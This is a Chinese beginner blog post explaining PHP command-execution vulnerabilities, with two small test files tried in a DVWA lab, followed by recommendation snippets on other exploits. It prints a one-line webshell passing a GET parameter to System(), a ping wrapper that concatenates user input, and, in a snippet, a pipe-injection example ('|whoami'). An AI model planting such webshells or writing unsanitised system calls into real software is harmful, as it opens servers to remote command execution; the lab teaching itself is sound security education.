命令执行漏洞

最新推荐文章于 2023-07-11 18:20:05 发布
最新推荐文章于 2023-07-11 18:20:05 发布
阅读量204 收藏
点赞数
分类专栏: 网安入门基础 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26139045/article/details/103589168
版权

命令执行漏洞

开发人员在进行开发的过程中,或多或少都会调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等。对于开发人员而言,使用这些函数可以方便去除系统的特殊功能等。但是也会带来一些命令执行漏洞。

黑客在渗透应用时,可能控制了某些函数中的参数,从而把想要执行的恶意代码接入到原来的正常代码中一起执行。

PHP命令执行漏洞

PHP是一门脚本语言,比较简洁、方便,但是不是事先编译好的运行速度上自然是没有优势的。而且他不能接触到系统底层,所以就必须要调用系统函数来执行一些指令,自然就造成了漏洞。

举几个例子来说明问题:

<?php
	System($_GET['cmd']);
?>

这个我觉得也可以算一句话木马吧,结合命令执行的密码,很多时候程序员代码过滤环节到位,PHP命令执行漏洞很少,我们可以自己创造。

我将其上传到DVWA里,进行访问http://192.168.42.157/DVWA/hackable/uploads/1.php?cmd=ipconfig

在这里插入图片描述

可以看到我输入的命令在系统中被执行了。

再试一个简单的案例:

<?php
	$cmd=($_GET['cmd']);
	System("ping ".$cmd);
?>

编写是要注意在ping后面留空格,毕竟cmd命令还是很吃格式的,格式错了那么效果可能就达不到了。一开始写的时候没有注意这个地方,试了一会儿都出不来结果,最后打开cmd对着看了才发现了空格漏了。

然后上传到DVWA靶机,在访问http://192.168.42.157/DVWA/hackable/uploads/1.php?cmd=www.baidu.com

在这里插入图片描述

结果可以看出我输入的参数被成功执行了。
这就是两个PHP的简单实例,当然除了代码里的系统函数调用的原因,还有可能是系统本身的漏洞造成命令执行。还有可能是调用的第三方组件纯在代码执行漏洞。这里我目前只有接触到PHP的所以就先这样了,还有很长的路需要走。

A1andNS
关注
专栏目录
命令执行漏洞详解
TechEnthusiast的博客
08-06 171
命令执行漏洞(Command Execution Vulnerability)是指应用程序在处理用户输入时,未对输入进行充分的过滤和验证,导致攻击者能够注入并执行系统命令的一种安全漏洞。这种漏洞可能导致攻击者获取服务器控制权,造成严重的安全威胁。命令执行漏洞是一种严重的安全威胁,可能导致整个系统被攻击者控制。开发人员应该充分了解其原理和防护措施,在开发过程中严格执行安全编码规范,避免使用危险函数,对用户输入进行严格验证和过滤。同时,应定期进行安全测试和代码审计,及时修复发现的漏洞
漏洞复现】泛微OA E-Cology ofsLogin 任意用户登录漏洞
最新发布
凝聚力安全团队
07-23 561
泛微OA E-Cology ofsLogin接口存在任意用户登录漏洞,不法分子可以利用这个漏洞绕过身份验证,以任意用户身份登录系统。这样,攻击者能够访问和操作系统中的敏感数据,执行用户权限内的所有操作,甚至可能提升权限,造成数据泄露、篡改等严重安全问题。
shiro远程命令执行漏洞检测工具.zip
11-15
shiro远程命令执行漏洞检测工具:包括了shiro_attack_2.2和ShiroExploit.V2.51,大家可根据需要自行下载
浅析JDWP远程命令执行漏洞 [ Mi1k7ea ]1
08-03
2022/3/2 下午8:30浅析JDWP远程命令漏洞 [ Mi1k7ea ]https://www.mi1k7ea.com/2021/08/06/浅析JDW
CmsEasy language_admin.php 后台命令执行漏洞.md
04-08
在CmsEasy的后台管理文件language_admin.php中,存在一个命令执行漏洞,这源于该文件对特定文件进行写入操作的处理不当。具体来说,攻击者可以通过构造特殊的HTTP请求,绕过安全检查并执行系统命令。这样的漏洞可能...
CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析1
08-03
**文章标题:**深入解析CVE-2020-24581:D-Link DSL-2888A远程命令执行漏洞 **文章正文:** D-Link DSL-2888A是一款由D-Link公司制造的统一服务路由器,它在AU_2.31_V1.1.47ae55之前的版本中存在一个严重的安全...
命令执行漏洞,详解。
m0_63028223的博客
04-30 1898
介绍漏洞:应用程序有时需要调用一些执行函数,如php中,使用system,exec,shell_exec,pasthur,popen,proc,proc_popen等函数可以执行系统命令,当黑客操控这些函数时,就可以将可以命令拼接在正常命令中,从而造成执行命令攻击。 下列以dvwa靶场为例进行介绍。 windows系统管道符命令; ”|“:直接执行后边的语句。 例如:ping 127.0.0.1|whoami "||":如果前边的执行语句为假则执行后边的语句,前边语句只能为假。 例如:ping
简述命令执行漏洞
weixin_51220765的博客
12-07 473
命令执行漏洞 应用场景: 程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序。当应用需要调用一些外部程序时就会用到一些执行系统命令的函数。 漏洞形成原因: 应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下,就会造成命令执行漏洞。 危害: 继承Web服务器程序的权限,去执行系统命令
2021-泛微OA V8 SQL注入漏洞
weixin_43227251的博客
04-13 1万+
泛微OA V8 SQL注入漏洞 漏洞描述 泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 泛微OA V8 FOFA app=“泛微-协同办公OA” 漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
做自己喜欢的事,并将其发挥到极致!
05-10 3132
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微新一代移动办公平台E-Cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件,实体签章的方式,泛微OA E-Cology平台browser.jsp处存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
泛微OA V8 SQL注入漏洞和文件上传漏洞
热门推荐
qq_52469895的博客
04-11 1万+
fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
漏洞复现-泛微WeaverOA系列
aming小老弟
10-03 1231
泛微OA
泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)
0xSec
07-11 9681
由于泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。
Web攻防:01章命令执行漏洞原理与防范
在第一节《命令执行介绍-01》中,我们深入探讨了Web应用程序中的命令执行漏洞这一关键概念。命令执行漏洞是指Web应用在处理用户输入时,未能对用户提供的数据进行充分过滤或净化,导致这些输入被误用为系统命令并在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值